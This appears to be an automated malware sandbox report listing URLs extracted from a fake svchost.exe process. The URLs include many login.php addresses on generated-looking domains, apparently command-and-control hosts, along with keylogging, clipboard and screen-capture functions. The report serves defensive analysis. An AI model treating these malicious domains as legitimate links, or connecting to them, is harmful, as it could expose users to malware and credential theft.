      Source: svchost.exe, 00000001.00000003.2195591504.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhiz.com/login.php
      Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
      Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynuh.com/login.php
      Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynuh.com/login.php.
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya
      Source: svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52
      Source: login[4].htm.1.drString found in binary or memory: http://galyqaz.com/display.cfm
      Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.php
      Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.php0
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.php
      Source: svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.phpd%
      Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
      Source: login[4].htm.1.drString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
      Source: svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvuj.com/login.php
      Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/login.php
      Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrysor.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
      Source: login[1].htm.1.dr, login[2].htm0.1.drString found in binary or memory: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC
      Source: svchost.exe, 00000001.00000003.1896894757.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxor.com/login.php
      Source: svchost.exe, 00000001.00000003.2195591504.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxor.com/login.php_L
      Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228769554.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynyx.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911720784.0000000002644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
      Source: svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.phpMy
      Source: svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.php
      Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.phpAppData
      Source: svchost.exe, 00000001.00000003.2679116854.0000000009212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyval.com/login.php
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyfuv.com/login.php
      Source: svchost.exe, 00000001.00000003.2784846138.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2107755824.000000000931B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2074934936.0000000009216000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868232084.000000000266E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000266C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyhyg.com/login.php
      Source: svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhuv.com/login.php
      Source: svchost.exe, 00000001.00000003.2274238543.0000000009210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzit.com/login
      Source: svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681450009.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzit.com/login.php
      Source: svchost.exe, 00000001.00000002.2911961286.000000000269F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycot.com/login.php
      Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyqem.com/login.php
      Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyqem.com/login.phpTemp
      Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.php
      Source: svchost.exe, 00000001.00000003.2832987183.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155767071.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910453874.0000000000863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911142449.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801116203.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4
      Source: svchost.exe, 00000001.00000003.2654498481.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
      Source: svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7http://ww16.vofycot.com/l
      Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c
      Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco
      Source: svchost.exe, 00000001.00000003.2654498481.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181
      Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co
      Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww3.galyqaz.com/
      Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww3.galyqaz.com/DigiCert
      Source: svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.php
      Source: svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.phpP
      Source: svchost.exe, svchost.exe, 00000001.00000003.2886286564.000000000926D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833106604.00000000026E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910825545.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688004757.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868421198.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911227483.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.000000000088D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2913316247.0000000009232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2209935730.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898455985.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801259005.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898624617.0000000009225000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
      Source: svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.coml
      Source: svchost.exe, 00000001.00000003.1681297112.000000000264B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
      Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
      Source: login[4].htm.1.drString found in binary or memory: https://cdn.consentmanager.net
      Source: login[4].htm.1.drString found in binary or memory: https://delivery.consentmanager.net
      Source: login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.drString found in binary or memory: https://domaincntrol.com/?orighost=
      Source: svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
      Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
      Source: svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/
      Source: svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228769554.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
      Source: svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/wp-json/
      Source: login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.drString found in binary or memory: https://nojs.domaincntrol.com
      Source: svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/
      Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com//
      Source: svchost.exe, 00000001.00000002.2911961286.000000000269F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898499255.0000000009247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1686977478.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
      Source: svchost.exe, 00000001.00000002.2912087987.00000000026CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;
      Source: svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/m/
      Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/wp-json/
      Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=gahyqah.com
      Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49654
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64293
      Source: unknownNetwork traffic detected: HTTP traffic on port 51114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 64286 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56400 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49661
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64286
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64296
      Source: unknownNetwork traffic detected: HTTP traffic on port 64278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49654 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56400
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
      Source: unknownNetwork traffic detected: HTTP traffic on port 64296 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49661 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56397 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56397
      Source: unknownNetwork traffic detected: HTTP traffic on port 64293 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51121 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64278
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49654 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49661 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51114 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51121 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64278 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64286 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64293 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64296 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56397 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56400 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: C:\Windows\apppatch\svchost.exeCode function: [tab]1_2_02D32B50
      Source: C:\Windows\apppatch\svchost.exeCode function: [del]1_2_02D32B50
      Source: C:\Windows\apppatch\svchost.exeCode function: [del]1_2_02D32B50
      Source: C:\Windows\apppatch\svchost.exeCode function: [ins]1_2_02D32B50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: [tab]8_2_012F2B50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: [del]8_2_012F2B50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: [del]8_2_012F2B50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: [ins]8_2_012F2B50
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D292D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_02D292D0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D292D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_02D292D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028992D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_028992D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024492D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_024492D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E92D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_012E92D0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D450E0 GetDesktopWindow,GetWindowDC,_snprintf,CreateCompatibleDC,Sleep,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,1_2_02D450E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D32B50 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,1_2_02D32B50

      E-Banking Fraud

      barindex
